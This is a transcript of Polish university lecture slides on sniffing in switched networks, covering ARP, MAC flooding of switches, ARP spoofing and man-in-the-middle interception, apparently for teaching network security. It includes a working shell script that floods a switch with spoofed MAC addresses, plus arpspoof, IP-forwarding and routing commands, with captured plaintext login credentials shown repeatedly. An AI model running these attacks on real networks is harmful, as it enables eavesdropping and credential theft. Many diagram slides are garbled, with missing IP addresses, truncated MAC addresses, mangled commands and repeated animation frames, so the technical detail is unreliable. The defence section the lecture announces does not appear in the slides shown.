Wyższa Szkoła Informatyki Stosowanej i Zarządzania. Jakub Stelmaszczyk. Sniffing w sieciach przełączalnych

Transkrypt

1 Wyższa Szkoła Informatyki Stosowanej i Zarządzania Jakub Stelmaszczyk Sniffing w sieciach przełączalnych

2 Niniejsze materiały są wyłącznie przykładem zagrożeń, na które narażone są sieci komputerowe Należy traktować je jako rozszerzenie wiedzy i pewien dodatek do standardowego programu zajęć SKO Autor nie ponosi odpowiedzialności za to, w jaki sposób użyta zostanie wiedza zawarta w dalszej części tego dokumentu Intencje autora są jasne - jeśli mamy pracować z sieciami, i przede wszystkim, dbać o ich bezpieczeństwo, musimy wiedzieć z jakimi zagrożeniami możemy się spotkać w przyszłości Autor dokumentu wierzy, że nikt z osób na sali, nie wykorzysta tych materiałów do czynów niezgodnych z prawem!

3 Protokół ARP - (Address Resolution Protocol) używany jest w sieciach lokalnych do kojarzenia adresu sieciowego (np IP) komputera z jego adresem łącza danych - MAC Istnieje też protokół odwrotny - RARP (Reverse ARP), który odwzorowuje adresy MAC na adresy IP Domena rozgłoszeniowa - (broadcast domain) jest częścią sieci, w której przekazywane są ramki rozgłoszeniowe, np zapytania ARP Przełączniki przesyłają ramki z adresem rozgłoszeniowym na wszystkie swoje porty - granice domeny wyznaczają routery (ograniczają one także domenę kolizyjną), które nie propagują rozgłoszeń Bardzo często domena rozgłoszeniowa pokrywa się z domeną kolizyjną Sniffing gromadzenie ruchu sieciowego i jego analiza Sniffer stanowi nieodzowne narzędzie diagnostyczne większości administratorów sieci, zwłaszcza podczas diagnostyki problemów z niezawodnością lub wydajnością połączeń Może być również stosowany do monitorowania aktywności sieciowej osób trzecich, co jest w większości przypadków niezgodne z prawem

4 ARP Spoofing - to termin określający atak sieciowy, który pozwala atakującemu przechwytywać dane przesyłane w obrębie segmentu sieci LAN (domeny rozgłoszeniowej) Technika ta może być również użyta do blokowania komunikacji (atak DoS) Atak polega na rozsyłaniu w sieci LAN odpowiednio spreparowanych pakietów ARP zawierających fałszywe adresy MAC W efekcie pakiety danych wysyłane przez inne komputery w sieci trafiają do osoby atakującej zamiast do właściwego odbiorcy Pozwala to na podsłuchiwanie komunikacji Inny wariant tego ataku polegający na przeprowadzeniu jednocześnie techniki ARP spoofingu wobec: bramy domyślnej w sieci celem przejęcia ruchu wysyłanego do atakowanego komputera atakowanego komputera celem przejęcia ruchu wysyłanego do bramy domyślnej umożliwia przejęcie zarówno pakietów wysyłanych jak i odbieranych przez atakowany komputer, a co za tym idzie, możliwa jest wtedy modyfikacja transmisji (atak typu Man In The Middle)

5 Atak Man In The Middle (MITM) to atak polegający na czytaniu i modyfikowaniu komunikacji między dwoma stronami bez ich wiedzy Atak Dos (Denial of Service) atak na system komputerowy lub usługę sieciową w celu uniemożliwienia jej działania Najprostszy DoS to wyciagnięcie wtyczki zasilającej z np router a ;-) Flooding switch a zalanie switcha ogromną ilością pakietów w celu przepełnienia jego bufora Wówczas będzie zachowywał się jak zwykły HUB i każda ramkę którą otrzyma na jeden ze swoich portów, prześle do wszystkich inny portów

6 Na początek warto odpowiedzieć sobie na kilka pytań:

7 Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić?

8 Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne?

9 Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne? 3 Jak to się robi?

10 Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne? 3 Jak to się robi? 4 Jak się zabezpieczyć?

11 Ad 1 Po co?

12 Ad 1 Po co? 1 Diagnostyka sieci

13 Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary

14 Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP

15 Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP 4 Przechwycenie plików, które ofiara kopiuje np na (z) serwer(a) ftp

16 Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP 4 Przechwycenie plików, które ofiara kopiuje np na (z) serwer(a) ftp 5 I wiele, wiele innych

17 Przykład Logujemy się na jakieś forum używając formularza na stronie WWW, np takiej :

18

19 Klikamy login i cieszymy się dostępem do forum A jak to widzi ktoś kogo celem ataku Man In The Middle jest właśnie nasz komputer? A no tak :

20 User : admin Password : kokoszka

21 Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie:

22 Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST

23 Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP

24 Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP 3 pop3, smtp

25 Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP 3 pop3, smtp 4 imap

26 A co jeśli hasło i login są szyfrowane?

27 A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło :

28 A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-)

29 A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle

30 A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle Konkluzja? stosujemy długie i mocne hasła!

31 A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle Konkluzja? stosujemy długie i mocne hasła! W dalszej części nie będziemy się jednak zajmować tym zagadnieniem, skupimy się na pozyskaniu danych niezbędnych do np złamania hasła

32 AD 2 Co jest nam potrzebne?

33 AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej)

34 AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump

35 AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump 3 Do ataku Flood potrzebny będzie jakiś program (lub skrypt) który wygeneruje ruch niezbędny do przepełnienia bufora switcha

36 AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump 3 Do ataku Flood potrzebny będzie jakiś program (lub skrypt) który wygeneruje ruch niezbędny do przepełnienia bufora switcha 4 Do ARPSpoofing u np w linuxie program arpspoof pozwalający zatruć protokół ARP

37 AD 3 Jak to się robi A więc konkrety Żeby coś oszukać trzeba najpierw wiedzieć jak to normalnie działa Dlatego też przyjrzyjmy się jak normalnie działa protokół ARP oraz w jaki sposób switch przekazuje ramki między portami

38 IP: /24 #: MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86

39 IP: /24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: /24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell :C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:ping

40 IP: /24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: /24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell :C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

41 IP: /24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: /24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell :C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

42 IP: /24 #: MAC: 00:C0:4F:17:B3:F8 #: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

43 IP: /24 MAC: 00:C0:4F:17:B3:F8 Przecież to ja, odpowiadam na tego ARP a! #: #: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has ? Tell IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

44 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

45 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

46 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

47 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

48 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8:86 #:

49 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

50 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8:86 IP: /24 MAC: Mamy komunikację na warstwie 2 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

51 Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło?

52 Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło? Ponieważ hasła wysyłane są do Internetu, komunikacja musi przejść przez bramę, chciał nie chciał Musimy więc przechwycić pakiety wysyłane i odbierane między ofiarą, a bramą domyślną

53 Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło? Ponieważ hasła wysyłane są do Internetu, komunikacja musi przejść przez bramę, chciał nie chciał Musimy więc przechwycić pakiety wysyłane i odbierane między ofiarą, a bramą domyślną Wiadomo też, że w modelu OSI warstwa druga jest nośnikiem warstw wyższych Dlatego przechwytując warstwę drugą, przechwytujemy warstwy wyższe, mamy więc hasła, rozmowy VoIP itd

54 Zacznijmy więc od najprostszej metody flooding switch a Do zalania go pakietami posłuży nam następujący skrypt #!/bin/sh for zm_8 in a b c d e f do for zm_9 in a b c d e f do for zm_10 in a b c d e f do for zm_11 in a b c d e f do for zm_12 in a b c d e f do ifconfig eth0 down ifconfig eth0 hw ether 00:00:0${zm_8}:${zm_9}${zm_10}:${zm_11}${zm_12} up arp -s <nieużywany_adres_ip> 00:05:05:05:6c:05 ping <nieużywany_adres_ip> -c 1 & done done done done done echo ${zm}

55 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

56 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #: at 00:50:DA:3B:F8:86 IP: /24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

57 IP: /24 MAC: 00:C0:4F:17:B3:F8 FLOOD (ICMP) Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

58 IP: /24 MAC: 00:C0:4F:17:B3:F8 FLOOD (ICMP) Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 Buffer Overflow!!! IP: /24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

59 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

60 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

61 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

62 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: / at 00:C0:4F:17:B3:F8 User : admin Password : kokoszka MAC: 00:50:DA:3B:F8:86

63 IP: /24 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 MAC: 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: /24 MAC: 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

64 IP: /24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh at 00:50:DA:3B:F8:86 IP: /24 MAC: 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8

65 Wadą tej techniki jest fakt, że zadziała tylko na tanich, niezarządzalnych switch ach Te droższe mają już zaimplementowane algorytmy pozwalające na wykrycie flooding u i zablokowanie nieznanych pakietów unicast lub multicast Przed tego typu atakiem można zabezpieczyć się budując sieć na droższym sprzęcie (CISCO Catalyst? ;-) ) Przejdźmy więc do bardziej wyrafinowanej metody do ARP Spoofing u i przykładu ataku Man In The Middle

66 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F at at 00:01:AC:21:EE:A0

67 IP: /24 MAC: 00:C0:4F:17:B3:F8 #:arpspoof -t at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F at at 00:01:AC:21:EE:A0

68 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F at at 00:01:AC:21:EE:A0

69 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:50:DA:3B:F8: is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F at at 00:01:AC:21:EE:A0

70 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports Src : Dst : 00:50:DA:3B:F8: is at IP: /24 MAC: 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F at at 00:01:AC:21:EE:A0

71 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

72 IP: /24 MAC: 00:C0:4F:17:B3:F8 #:arpspoof -t at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:C0:4F:17:B3:F is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

73 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:C0:4F:17:B3:F is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

74 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : Dst : 00:C0:4F:17:B3:F is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

75 IP: /24 #: MAC: 00:C0:4F:17:B3:F at 00:50:DA:3B:F8: at at 00:01:AC:21:EE:A0 Src : Dst : 00:C0:4F:17:B3:F is at IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

76 IP: /24 #: MAC: 00:C0:4F:17:B3:F at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

77 IP: /24 MAC: 00:C0:4F:17:B3:F8 #:sysctl netipv4ip_forward= at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

78 IP: /24 #: MAC: 00:C0:4F:17:B3:F at at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

79 IP: /24 #: MAC: 00:C0:4F:17:B3:F at at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

80 IP: /24 #: MAC: 00:C0:4F:17:B3:F at at at 00:01:AC:21:EE:A0 IP: /24 MAC: Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

81 IP: /24 #: MAC: 00:C0:4F:17:B3:F at at at 00:01:AC:21:EE:A0 Src : 00:50:DA:3B:F8:86 Dst : IpDest : IP: /24 IpSrc : Destport MAC: : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: /24 MAC: 00:50:DA:3B:F8: at at at 00:01:AC:21:EE:A0

82 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: /24 MAC: #: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

83 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: Udało się, atakujacy zdobył pakiet z hasłem, musimy jednak sprawić aby komunikacja ofiary z serwerem www nadal miała miejsce Przesyłamy pakiet dalej at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

84 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 #:route default gw Src : 00:50:DA:3B:F8:86 Dst : IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

85 at at at 00:01:AC:21:EE:A0 IP: /24 MAC: 00:C0:4F:17:B3:F8 IP: /24 MAC: at 00:50:DA:3B:F8: at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : IpSrc : Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: / at at at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

